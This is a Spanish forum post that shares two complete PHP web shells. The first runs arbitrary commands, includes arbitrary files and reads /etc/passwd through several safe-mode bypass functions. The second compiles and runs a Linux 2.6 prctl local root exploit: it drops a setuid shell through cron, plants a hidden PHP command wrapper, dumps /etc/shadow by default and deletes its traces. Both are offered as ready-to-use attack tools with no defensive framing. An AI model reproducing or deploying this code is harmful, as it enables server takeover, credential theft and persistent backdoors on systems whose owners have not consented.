WebSHells

Aqui os dejo una con bypass:

Código:

<?php
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$addr=$_SERVER['SERVER_ADDR'];
$disable_func=@ini_get('disable_functions');
$current=@getcwd();
$freedisk=@diskfreespace($current);
$server_sys=getenv('SERVER_SOFTWARE');
$totaldisk=@disk_total_space($current);
$title="canberX's priv8 bypass script | coded for ir4dex";
$bypass1=$_GET["bypass1"];
$bypass2=$_GET["bypass2"];
$bypass3=$_GET["bypass3"];
$bypass4=$_GET["bypass4"];
$bypass5=$_GET["bypass5"];
$bypass6=$_GET["bypass6"];
$sdir=$_GET["sdir"];
$phpinf=$_GET["phpinfo"];
$bypass_mode=$_GET["bypass_mode"];
$cmd=$_GET["cmd"];
$cdir=$_GET["cdir"];
$crdir=$_GET["crdir"];

if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;      // thanx Rush Security Team's r57 Shell for this function %)
$_GET  = &$HTTP_GET_VARS;
}

function user_sys(){
if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
{
$usrinf=@posix_getpwuid(@posix_geteuid());
$grpinf=@posix_getgrgid(@posix_getegid());
echo 'uid='.$usrinf['uid'].' ('.$usrinf['name'].') gid='.$grpinf['gid'].' ('.$grpinf['name'].')';
}
else
{echo "user=".strtolower(@get_current_user())." uid=".@getmyuid()." gid=".@getmygid();
if(@getmyuid()=="0" && @getmygid()=="0")
{echo "<font color='green'> - y0u are <b>r00t</b></font>";}
}
}

function safemode_test()
{
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{echo "<font color=\"green\"><b>ON :(</b></font>";}
else
{echo "<font color=\"red\"><b>OFF :)</b></font>";}
}

function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}

if (!@function_exists("view_size"))
{
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
}

function wndir()
{
if(is_dir($dosya))
{
$dmod="d";
} else {$dmod="-";}

if(is_writable($dosya))
{
$wmod="w";
} else {$wmod="-";}

if(is_readable($dosya))
{
$rmod="r";
} else {$rmod="-";}

if(is_executable($dosya))
{
$emod="x";
} else {$emod="-";}
$dir[]="$dmod"."$rmod"."$wmod"."$emod"."$rmod"."$wmod"."$emod"."  $dosya";
}

function scanned_dir($gel){
if(empty($gel))
{$gel=".";}
$git=@opendir($gel);
while($dosya=@readdir($git))
{
if(perms(@fileperms($dosya)))
{$dir[]=perms(@fileperms($dosya))." $dosya";}
else
{wndir();}
}

foreach ($dir as $list)
{echo "$list\n";}
@closedir($git);
}

function cmd_test($cmd)
{
if(function_exists("passthru"))
{passthru($cmd);}
elseif(function_exists("system"))
{@system($cmd);}
elseif(function_exists("system_exec"))
{@system_exec($cmd);}
elseif(function_exists("shell_exec"))
{@shell_exec($cmd);}
elseif(function_exists("exec"))
{@exec($cmd);}
elseif(function_exists("eval"))
{eval($cmd);}
return $cmd;
}

// Bypass Functions - priv8 priv8 priv8
function bypass1($gel1)
{include ("$gel1");}

function bypass2($gel1)
{require ("$gel1");}

function bypass3($gel1)
{
$cmdz=@imap_open($gel1, "", "");
$pwr=@imap_body($cmdz, 1);
echo $pwr;
@imap_close($cmdz);
}

function bypass4($gel1)
{
$cmdz=@imap_open('/etc/passwd', "", "");
$dirl=@imap_list($cmdz,trim($gel1),"*");
for ($i = 0; $i<count($dirl);$i++)
echo $dirl[$i]."\r\n";
@imap_close($cmdz);
}

function bypass5($gel1)
{
$git=@opendir($gel1);
while($dosya=@readdir($git))
{$dir[]=$dosya;}
foreach ($dir as $list)
{echo "$list\n";}
@closedir($git);
}

function bypass6($gel1)
{
$git=@fopen("$gel1","r");
$users_etc=fgets($git,1024);
echo "$users_etc\n";
fclose($git);
}

/* Pages */
if(!empty($phpinf))
{echo "<center><b>PHP INFO:</b><br>";phpinfo();die("[<a href='".$_SERVER['PHP_SELF']."'>back</a>]</center>");}

/* Face of the ir4dex web shell */
echo "<html><head></head><title>$title</title><body>";
echo "<h3>$title</h3>\n";
echo "priv8 - priv8 - priv8 !<br>\ncoded by canberX for <b>IR4DEX</b><br>\n";
echo "<small>brazillian h4x0r's ruLz</small><br>\n";
echo "/s irc.gigachat.net #ir4dex<br><br>\n";
echo "<hr>\n";
echo "<h4>Server Infos:</h4>";
echo "<b>safe mode: </b>";
safemode_test();
echo "<br>\n";
echo "<b>server uname: </b>".php_uname()."<br>\n";
echo "<b>user: </b> ";
user_sys();
echo "<br>\n";
echo "<b>currentdir: </b> $current<br>\n";
echo "<b>freespace: </b>".view_size($freedisk)."<br>\n";
echo "<b>totalspace: </b>".view_size($totaldisk)."<br>\n";
echo "<b>server system: </b>$server_sys<br>\n";
echo "<b>disabled funcs: </b>$disable_func<br>\n";
echo "<b>server addr: </b>$addr<br>\n";
echo "<b>y0u are: </b>".$_SERVER['PHP_SELF']."<br>\n";
echo "<b>eval menu:</b>";
echo "- [<a href='".$_SERVER['PHP_SELF']."?phpinfo=true' title='phpinfo();'>phpinfo</a>] -\n";
echo "[<a href='".$_SERVER['PHP_SELF']."?bypass_mode=true' title='safe mode bypass section &)'>bypass</a>] -<br><br>\n";
echo "<form method='GET'><b>my code:</b><br><input type='text' size='80' name='cmd'></form>\n";
echo "<form method='GET'><b>w0rk here:</b><br><input type='text' size='80' name='cdir' value='".$cdir."'></form>\n";
echo "<form method='GET'><b>create dir:</b><br><input type='text' size='80' name='crdir' value='dir name'></form><br>\n";
echo "<hr><br>\n";
echo "<textarea rows='10' cols='120'>\n";

if(!empty($cdir))
{scanned_dir($cdir);}
else
{scanned_dir($cdir);}

echo "</textarea>\n";
echo "<textarea rows='10' cols='120'>\n";
if(!empty($sdir))
{scanned_dir($sdir);}

if(!empty($cmd))
{cmd_test($cmd);}

if(!empty($crdir))
{mkdir($crdir);}

if(!empty($bypass1))
{bypass1($bypass1);}

if(!empty($bypass2))
{bypass2($bypass2);}

if(!empty($bypass3))
{bypass3($bypass3);}

if(!empty($bypass4))
{bypass4($bypass4);}

if(!empty($bypass5))
{bypass5($bypass5);}

if(!empty($bypass6))
{bypass6($bypass6);}

echo "</textarea>\n";
echo "<br><br><b>Extra Funcs:</b><br>\n<textarea rows='6' name='extf' cols='120' readonly='true'>\n";
if(is_file("config.php")){echo "site have config.php\n";} else {echo "site haven't got config.php\n";}
if(is_writable("index.php")){echo "index.php will writable\n";}else {echo "index.php won't writable\n";}
if(is_writable("index.html")){echo "index.html will writable\n";}else {echo "index.html won't writable\n";}
if(is_writable("index.htm")){echo "index.htm will writable\n";}else {echo "index.htm won't writable\n";}
if(is_readable("/etc/passwd")){echo "/etc/pass will readable\n";}else {echo "you can not read the /etc/passwd\n";}
if(is_writable("/etc/passwd")){echo "/etc/pass will writable\n";}else {echo "you can not write the /etc/passwd\n";}
echo "</textarea>\n";
echo "<br><hr><br>\n";
echo "<form method='GET'><b>file bypass with include:</b> <input type='text' size='80' name='bypass1' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>file bypass with require:</b> <input type='text' size='80' name='bypass2' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>file bypass with imap_body:</b> <input type='text' size='80' name='bypass3' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>/etc/passwd bypass with fopen:</b> <input type='text' size='80' name='bypass6' value='/etc/passwd'></form>\n";
echo "<form method='GET'><b>dir bypass with imap_list:</b> <input type='text' size='80' name='bypass4' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>dir bypass with opendir:</b> <input type='text' size='80' name='bypass5' value='".$sdir."'></form>\n";
echo "<hr><small><b>$title</b></small>";
?>

Y otra:

Código:

<?php
/*
#######################################
# #
# PRIVATE! PRIVATE! PRIVATE! #
# #
# XOR CREW #
# #
# #
#######################################
*/
set_time_limit(0);
if(isset($_POST['exploit_it'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
if($_POST['compiler'] == "none") {
echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>';
end;
}
$cc = $_POST['compiler'];
$prctl = '#!/bin/sh

cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
if (getuid() == 0) {
printf("\n

* We have root!\n\n" );

system("/bin/sh");
system("$_POST[cmd]");
';
if(!stristr($_POST['shell'],"could not be found")) {
$prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");';
}
$prctl .= 'system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/core*");
system("exit");
} else {
printf("\n[-] Failed.\n\n" );
system("rm -rf '.$_ENV["TMPDIR"].'/s");
}
return 0;
}
__EOF__
';

$phpwrapper = '<?php
if(isset($_GET[cmd])) {
echo "<pre>";
echo passthru("'.$_POST['shell']. -c "$_GET[cmd]\"");
echo "</pre>";
}
?>';
echo "<pre><div align='center'>";
$h = fopen("/tmp/a.sh", "w");
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit....<br />";
echo passthru("sh /tmp/a.sh");
echo passthru("$cc -o /tmp/s /tmp/s.c");
echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c");
echo "Running exploit...waiting about 4 minutes to see if exploit worked<br />";
echo passthru("/tmp/getsuid");
echo passthru("/tmp/s");
echo "Cleaning up<br />";
echo passthru("rm -rf /tmp/getsuid*");
echo passthru("rm -rf /tmp/s.c");
echo passthru("rm -rf /tmp/a.sh");
echo "Done!<br />
</div>
</pre>";

} else {
echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname();
}
} else {

?>
<div align="center">
<h4>PHP Attack Script</h4>
<h5><?php echo php_uname(); ?></h5>
<pre><div align="center">
Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?>
Checking for cc or gcc............<?php
$path = explode(":",$_ENV["PATH"]);
$gotcc = FALSE;
$gotgcc = FALSE;
foreach($path as $dir) {
if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) {
$gotcc = TRUE;
$pathtocc = $dir."/cc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
} elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) {
$gotgcc = TRUE;
$pathtogcc = $dir."/gcc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
}
}
if($gotcc == FALSE && $gotgcc == FALSE) {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
?>
Checking for execute permissions..<?php
$h = fopen("/tmp/test.sh","w");
fwrite($h,"#!/bin/sh");
fclose($h);
system("sh /tmp/test.sh",$returnval);
if($returnval == 0) {
echo '[ <font color="#00CC00">OK</font> ]'."\n";
} else {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
passthru("rm -rf /tmp/test.sh");
?>
</pre></div><br />
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Prctl 2.6.x exploit</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">Location and name for root shell:</div></td>
<td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td>
</tr>
<tr>
<td><div align="right">Location and name for php shell wrapper: </div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td>
</tr>
<tr>
<td><div align="right">Commands to perform while root <br />seperate multiple commands with ; : </div></td>
<td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td>
</tr>
</table>
</div>
<div align="center">
<input type="hidden" name="compiler" value="<?php
if(isset($pathtocc)) {
echo $pathtocc;
} elseif(isset($pathtogcc)) {
echo $pathtogcc;
} else {
echo 'none';
}
?>" />
<input type="hidden" name="exploit_it" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
After pressing submit it may take up to 4 minutes for the page to load depending
on exploit. <br />
This is due to the exploit being run.<br />
If exploit fails the system may be patched or kernel may not be vuln.
</div>
</form>
<?php } ?>